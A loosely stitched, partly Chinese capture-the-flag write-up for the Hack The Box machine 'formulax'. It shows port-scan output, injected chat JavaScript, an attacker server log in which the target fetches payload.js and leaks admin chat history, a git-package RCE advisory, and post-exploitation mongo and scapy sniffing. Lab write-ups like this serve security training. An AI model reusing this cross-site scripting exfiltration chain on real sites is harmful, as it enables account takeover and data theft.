PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG8rGSIhEBCPw+TyWPlQnCQOhuDZwBuKTDmhMvwgTYIpqvWGe1d5Mtt2LA1hpEl/0cYRCmDfmsgs4xWffPDaK48= | 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDxdSOINZhnpi+VKvc9X6X/yYgzl88VdajTFgliPg6Jl 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) |_http-cors: GET POST |_http-favicon: Unknown favicon MD5: 496A37014B10519386B2904D1B3086BE | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: nginx/1.18.0 (Ubuntu) | http-title: Site doesn't have a title (text/html; charset=UTF-8). |_Requested resource was /static/index.html Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
let value; const res = axios.get(`/user/api/chat`); const socket = io('/',{withCredentials: true});
//listening for the messages socket.on('message', (my_message) => {
//console.log("Received From Server: " + my_message) Show_messages_on_screen_of_Server(my_message)
})
consttyping_chat = () => { value = document.getElementById('user_message').value if (value) { // sending the messages to the server socket.emit('client_message', value) Show_messages_on_screen_of_Client(value); // here we will do out socket things.. document.getElementById('user_message').value = "" } else { alert("Cannot send Empty Messages"); }
constmanepwn = () => { value = "history" if (value) { // sending the messages to the server socket.emit('client_message', value) Show_messages_on_screen_of_Client(value); // here we will do out socket things.. document.getElementById('user_message').value = "" } else { alert("Cannot send Empty Messages"); } }
10.129.230.190 - - [10/Mar/2024 04:19:39] "OPTIONS /?=Greetings!. How can i help you today ?. You can type help to see some buildin commands HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:40] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:40] "OPTIONS /?=Hello, I am Admin.Testing the Chat Application HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:40] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:40] "OPTIONS /?=Write a script for dev-git-auto-update.chatbot.htb to work properly HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:40] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:40] "OPTIONS /?=Message Sent:<br>history HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:40] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:40] "OPTIONS /?=Write a script to automate the auto-update HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:43] "GET /payload.js HTTP/1.1" 200 - 10.129.230.190 - - [10/Mar/2024 04:19:43] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:43] "OPTIONS /?=Greetings!. How can i help you today ?. You can type help to see some buildin commands HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:44] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:44] "OPTIONS /?=Hello, I am Admin.Testing the Chat Application HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:44] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:44] "OPTIONS /?=Write a script for dev-git-auto-update.chatbot.htb to work properly HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:44] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:44] "OPTIONS /?=Write a script to automate the auto-update HTTP/1.1" 501 - 10.129.230.190 - - [10/Mar/2024 04:19:44] code 501, message Unsupported method ('OPTIONS') 10.129.230.190 - - [10/Mar/2024 04:19:44] "OPTIONS /?=Message Sent:<br>history HTTP/1.1" 501 -
整理了下:
1 2 3 4
Hello, I am Admin.Testing the Chat Application Write a script for dev-git-auto-update.chatbot.htb to work properly Message Sent:<br>history Greetings!. How can i help you today ?. You can type help to see some buildin commands
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the clone(), pull(), push() and listRemote() methods, due to improper input sanitization. This vulnerability exists due to an incomplete fix of CVE-2022-25912.
www-data@formulax:/opt$ mongo MongoDB shell version v4.4.29 connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb .....
> show dbs admin 0.000GB config 0.000GB local 0.000GB testing 0.000GB
frank_dorky@formulax:~$ scapy INFO: Can't import PyX. Won't be able to use psdump() or pdfdump(). WARNING: IPython not available. Using standard Python shell instead. AutoCompletion, History are disabled. aSPY//YASa apyyyyCY//////////YCa | sY//////YSpcs scpCY//Pp | Welcome to Scapy ayp ayyyyyyySCP//Pp syY//C | Version 2.5.0 AYAsAYYYYYYYY///Ps cY//S | pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy SPPPP///a pP///AC//Y | A//A cyP////C | Have fun! p///Ac sC///a | P////YCpc A//A | We are in France, we say Skappee. scccccp///pSP///p p//Y | OK? Merci. sY/////////y caa S//P | -- Sebastien Chabal cayCyayP//Ya pY/Ya | sY/PsY////YCc aC//Yp sc sccaCY//PCypaapyCP//YSs spCPY//////YPSps ccaacs >>> capture = sniff(iface="lo", filter="tcp and port 3000")
如果你是新手,使用上面的鏈接加入 HTB 的 academy 就可以免費看 Tire 0 的所有教程,這對初學者來説是很友好的。 (建議先完成 INTRODUCTION TO ACADEMY)
If you are a beginner, join HTB’s academy with this link to get free access to all the tutorials for Tire 0. This is very beginner friendly. (It is recommended to complete INTRODUCTION TO ACADEMY first)